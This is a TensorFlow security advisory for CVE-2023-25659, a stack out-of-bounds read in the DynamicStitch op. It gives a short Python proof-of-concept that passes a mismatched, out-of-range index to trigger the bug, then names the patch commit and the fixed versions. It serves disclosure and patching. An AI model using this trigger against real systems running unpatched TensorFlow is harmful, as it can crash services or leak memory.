## TFSA-2023-018: OOB read in DynamicStitch

### CVE Number
CVE-2023-25659

### Impact
If the parameter `indices` for `DynamicStitch` does not match the shape of the parameter `data`, it can trigger an stack OOB read.

```python
import tensorflow as tf
func = tf.raw_ops.DynamicStitch
para={'indices': [[0xdeadbeef], [405], [519], [758], [1015]], 'data': [[110.27793884277344], [120.29475402832031], [157.2418212890625], [157.2626953125], [188.45382690429688]]}
y = func(**para)
```

### Patches
We have patched the issue in GitHub commit [ee004b18b976eeb5a758020af8880236cd707d05](https://github.com/tensorflow/tensorflow/commit/ee004b18b976eeb5a758020af8880236cd707d05).

The fix will be included in TensorFlow 2.12. We will also cherrypick this commit on TensorFlow 2.11.1.


### For more information
Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.


### Attribution
This has been reported via Google OSS VRP.